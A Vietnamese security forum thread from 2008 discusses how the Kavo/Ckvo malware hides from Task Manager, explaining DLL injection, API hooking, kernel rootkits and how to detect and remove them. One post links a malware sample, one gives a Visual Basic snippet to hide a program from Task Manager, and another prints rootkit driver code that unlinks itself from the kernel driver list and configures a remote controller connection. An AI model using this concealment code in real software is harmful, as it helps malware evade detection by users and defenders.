English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo.  XML
  [Question]   [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 16/08/2008 21:31:34 (+0700) | #1 | 147177
[Avatar]
 kamikazeq
Member
[Minus]    0    [Plus]
Joined: 04/07/2006 03:20:53
Messages: 837
Location: Panic Malware Planet
Offline
[Profile] [PM] [Yahoo!]
http://www.box.net/shared/sktoux5p94 <<<<
Em nì dính vào là không thấy mặt mũi đâu trong Taskmanager.
Có nhiều file EXE và BAT của em rãi rác khắp máy nhưng hình như không quan trọng.
Chủ chốt hình như là đám ckvoX.dll trong system32.

_Phải chăng em này khi đã dính vào máy thì chỉ có DLL làm việc, còn đám kia chỉ là bù nhìn (rãi mầm cho zui, lừa ai dính lại ráng chịu).
_Dùng mấy trình dò DLL thì thấy 1 số process có LOAD luôn cái DLL của ẻm.
_Có phải cách thức này gọi là Hook, hay Inject, hay gọi là gì? (cách gọi chính xác nha mấy bác)
_Và có phải vì Virus chỉ cho DLL chạy thôi, nên trong mấy trình show process (chỉ show các process kiểu *.exe) nên "vô tình hoặc cố ý" trở thành 1 kiểu núp trong TaskManager.

Vụ này thắc mắc lâu mà giờ mới hỏi smilie. Mong được các bác tận tình thảo luận.
IDM 5.18 http://tinyurl.com/pl2ejj | Quick Remove Malware http://tinyurl.com/lbbm9x - http://tinyurl.com/arna6g
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 16/08/2008 22:49:23 (+0700) | #2 | 147189
congminh923
Member
[Minus]    0    [Plus]
Joined: 26/02/2008 22:35:52
Messages: 278
Location:
Offline
[Profile] [PM] [Yahoo!]
_Chắc nó dùng công nghệ rookit đấy. Thay vì dùng chương trình antivirus bình thường thì nên dùng chương trình chuyên trị rootkit mới được. VD : UnHackMe
_Cách 1 nghe có vẻ xa vời quá, chúng ta không phải là lập trình viên thì khó thực hiện được, vậy thì chuyển qua cách 2 :

Với Visual Basic :

Chép đoạn code sau đây vào phần code của một chương trình:

Private Sub Form_Load ()
Me.Hide
App.TaskVisible=False
End Sub

Chỗ tôi bôi đậm là chỗ quan trọng nhất. Bạn nào giỏi thì có thể dùng ngôn ngữ khác như Visual C++ hay DelPhi, Pascal,... nhưng tốn nhiều công sức hơn. smilie

Chúc các bạn tìm và tạo virus thành công.smilie (Lỡ tạo rồi thì đừng có tung lên mạng nhé, tui bị mấy con worm là sợ tới già)

PS : Hình như bây giờ có một số loại rootkit có thể ẩn mình trong Process Monitor, Process Explorer,... (các công cụ của Sysinternal). Nên xài Process Explorer,... đôi khi không hiệu quả lắm.
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 16/08/2008 23:47:59 (+0700) | #3 | 147211
luckylac
Member
[Minus]    0    [Plus]
Joined: 19/08/2004 00:39:12
Messages: 30
Offline
[Profile] [PM]
kỹ thuật nhúng mã độc trong dll vào process khác gọi là inject dll
-mục đích là để hoạt động trên process hợp lệ
- đồng thời dùng để hook hàm API của win các bạn có thể thấy thằng IDM và LACViet Tu Dien đều phải làm như vậy.. vì thằng Unikey muốn bắt cái hàm Drawtext của process bị inject để lấy thông tin .... thằng IDM bắt cái hàm downloadfile để lấy cái link ....
con kavo nó muốn ẩn trong taskmanager thì nó phải inject vào taskManager rồi bắt cái hàm get những process trong hệ thống.... rồi thay đổi thông tin (xóa tên nó đi) rồi trả cho taskmanager .. vậy là ẩn dc rồi.. cách này có từ thời tam quốc diễn nghĩa lận.. nhưg vì giờ chả mấy ai xài taskmanager nữa nên ít ai viêt như vậy...

cái hook này gọi là hook toàn cục.. hook API dùng IAT

trước giờ thấy dòng họ nhà con kavo vẫn dễ diệt... 15' là xong... vì nó toàn là inject dll

Các bạn chú ý là nếu là rootkit (file .sys) chạy từ khi win đang load (chạy qua chạy lại vài cục rồi mới vô màn hình log on đó) thì rootkit đã dc load....vì nó là driver. Rootkit thì nó nằm trong kernel ... nó bắt được hàm Native API luôn chứ ko thèm API thường (Native API nằm trong kernel... API thì nằm ngoài....) . Do đó đã viết rookit thì ít khi ngừoi ta xài inject .. nhưng đôi khi để lừa nhau thì vẫn làm....
Nên chắc chắn dòng họ nhà kavo ko phải rootkit ...viết rootkit ở việt nam chưa thấy con nào ngon hết.

Thậm chí cách đây 1 năm mình thấy BKAV vẫn chưa chạy dc ở mức driver hay sao đó.....

Trên đây là chút thôg tin mún share với các bạn.... Có gì sai sót bỏ qua nha.....
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 17/08/2008 00:56:55 (+0700) | #4 | 147225
[Avatar]
 kamikazeq
Member
[Minus]    0    [Plus]
Joined: 04/07/2006 03:20:53
Messages: 837
Location: Panic Malware Planet
Offline
[Profile] [PM] [Yahoo!]
Hì, ít gì, nhìu ấy chứ. smilie
Các bạn chú ý là nếu là rootkit (file .sys) chạy từ khi win đang load (chạy qua chạy lại vài cục rồi mới vô màn hình log on đó) thì rootkit đã dc load....vì nó là driver
Rootkit thì nó nằm trong kernel ... nó bắt được hàm Native API luôn chứ ko thèm API thường (Native API nằm trong kernel... API thì nằm ngoài....)  


Vây dùng 1 số Tool chuyên Detect file Sys Rootkit, và rồi phải làm gì với file Sys đó.
Có bao nhiêu cách để vô hiệu nó?
Và giả sử chỉ có mỗi file sys ấy bị vô hiệu thì Virus sử dụng kĩ thuật đó có bị hiện nguyên hình hay không, hay là thế nào?

Nôm na thì Virus "xài" cái file sys (kĩ thuật rootkit) ấy như thế nào?
Mình mới biết được có file sys làm rootkit thôi. Ngoài ra có kĩ thuật khác và dạng file khác hay không?

Bbạn tiếp mấy câu của mình hen, mình muốn đi thực tế 1 chút.
IDM 5.18 http://tinyurl.com/pl2ejj | Quick Remove Malware http://tinyurl.com/lbbm9x - http://tinyurl.com/arna6g
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 17/08/2008 02:44:43 (+0700) | #5 | 147241
luckylac
Member
[Minus]    0    [Plus]
Joined: 19/08/2004 00:39:12
Messages: 30
Offline
[Profile] [PM]
okie ....

Thía này....Rootkit chính là driver... bạn có thể thấy có rất nhiều driver trong hệ thống..
ko khó để viết 1 driver ..có thể thấy là các hãng phần cứng viết đầy ra đó...
driver muốn chạy phải được đăng ký với win bằng registry ..hoặc cũng có 1 số driver dạng plug&play
việc đăng ký rất giống đăng ký 1 service
thông tin đăng ký dễ bị phát hiện bởi các chtr detect key trong registry

Vì rootkit nằm trong kernel.. có quyền tương tác với kernel.... bằng Native API
shell của window là explorer
khi bạn mở 1 cửa sổ để list các file trong HDD . thì chính thằng explorer mở ra cho bạn coi.. thằng explorer sẽ hỏi kernel ... nhưng ko trực tiếp .. mà thông qua API thuần.... và API thuần sẽ gọi Native API .. và kernel sẽ dùng NativeAPI khác để kiếm thông tin và trả về cho explorer ..hiển thị kết quả mà bạn nhìn thấy.

Roài...
Vậy rootkit nằm trong kernel .. nó được phép dùng Native API.. vậy nó sẽ chặn được những thông tin trong việc vấn đáp của kernel và explorer.. nó có thể sửa thông tin này..
Và cái mà rootkit thường làm là sẽ ẩn mình.. ko cho explorer thấy đường dẫn và các khóa đăng ký trong registry . Cách đơn giản là.. cứ chặn dc thông tin mà có cái tên rootkit thì giữ thông tin đó lại...

Kết quả là rootkit ko dc nhìn thấy trong win .Điều đó giải thích tại sao trong DOS thực thì sẽ thấy.. vì ở đó rootkit ko chạy.


Okie.. vậy làm sao mà detect dc rootkit .... thực ra đã biết viết driver thì viết cái detect chả có gì khó....
Các chtr detect hay AV làm thế này... Nó sẽ lần lượt kiếm trong HDD .. kiếm bằng hàm đọc sector vật lý... sẽ kiếm đươc thông tin về file ... nó sẽ hỏi win là có file đó ko.. nếu win nói ko . .thì nó sẽ raise lên là file này bị ẩn đối với WIN...
Tương tự như thế nó sẽ đọc file hive lưu registry và cũng hỏi win là có ko ? nếu trả lời ko thì cũng đưa cái key đó vào dạng tinh nghi..
Chính vì trong registry và HDD có những cái mà mặc định do win ẩn đi chứ ko phải rootkit ... nên ko 1 chtr detect nào dám khẳng định đâu là rootkit vì có thể nhầm với những cái này .


Roài.. xem ra diệt rootkit cũng ko khó đúng ko?


việc đầu tiên là kiểm tra những driver dc đăng ký mới... nếu con rootkit ko ẩn mình thì biết dc rồi đó
còn nếu ko thấy có gì khả nghi .. thì detect rootkit bằng tool detect như đã nói ở trên...
sau khi biết dc rootkit...
thì bỉnh tĩnh vô DOS (thực) ... delete nó đi
sau đó vô tiếp tục với mấy con inject dll khác chẳng hạn.... (vì chả ai ngu chỉ dùng có mỗi rootkit .. sẽ có những trứng phục sinh khác)..


[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 17/08/2008 06:48:57 (+0700) | #6 | 147288
congminh923
Member
[Minus]    0    [Plus]
Joined: 26/02/2008 22:35:52
Messages: 278
Location:
Offline
[Profile] [PM] [Yahoo!]
Bạn luckylac nói lý thuyết hay quá. Vậy bây giờ bạn đưa ra đoạn code như vậy đi. (để minh họa). smilie
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 17/08/2008 07:04:32 (+0700) | #7 | 147293
luckylac
Member
[Minus]    0    [Plus]
Joined: 19/08/2004 00:39:12
Messages: 30
Offline
[Profile] [PM]
hahaha...
dc thôi ....

mình viết mấy con rootkit rồi .. chứ ko phải nói chơi như các bạn đâu..
code search thiếu gì....
nhưng chắc bạn ko hiểu đâu
mà code VB thì quên nó đi ...


đây này....
.. mấy bác mode đừng xóa làm gì.. dân chúng chắc ko xài dc đâu .......

Code:
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
 DRIVER_DATA* driverData;

 // Get the operating system version
 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

 // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
 // Major = 5: Windows Server 2003, Windows XP or Windows 2000
 // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
 // Minor = 1: Windows XP
 // Minor = 2: Windows Server 2003

 if ( majorVersion == 5 && minorVersion == 2 )
 {

  DbgPrint("comint32: Running on Windows 2003");
 }
 else if ( majorVersion == 5 && minorVersion == 1 )
 {

  DbgPrint("comint32: Running on Windows XP");
 }
 else if ( majorVersion == 5 && minorVersion == 0 )
 {
  DbgPrint("comint32: Running on Windows 2000");
 }
 else if ( majorVersion == 4 && minorVersion == 0 )
 {

  DbgPrint("comint32: Running on Windows NT 4.0");
 }
 else
 {

  DbgPrint("comint32: Running on unknown system");
 }

 // Hide this driver
 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
 if( driverData != NULL )
 {
  // unlink this driver entry from the driver list
  *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
  driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
 }

// Allow the driver to be unloaded

 pDriverObject->DriverUnload = OnUnload;

 // Configure the controller connection
 if( !NT_SUCCESS( Configure() ) )
 {
  DbgPrint("comint32: Could not configure remote connection.\n");
  return STATUS_UNSUCCESSFUL;
 }

 return STATUS_SUCCESS;
}
[Up] [Print Copy]
  [Question]   Re: [Thắc mắc bàn luận] Kỹ thuật núp trong Taskmanager của Ckvo. 17/08/2008 07:10:19 (+0700) | #8 | 147295
congminh923
Member
[Minus]    0    [Plus]
Joined: 26/02/2008 22:35:52
Messages: 278
Location:
Offline
[Profile] [PM] [Yahoo!]
Sao bạn không nói ngôn ngữ bạn dùng là gì. Tôi thấy nó giống ngôn ngữ C++ quá. smilie
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|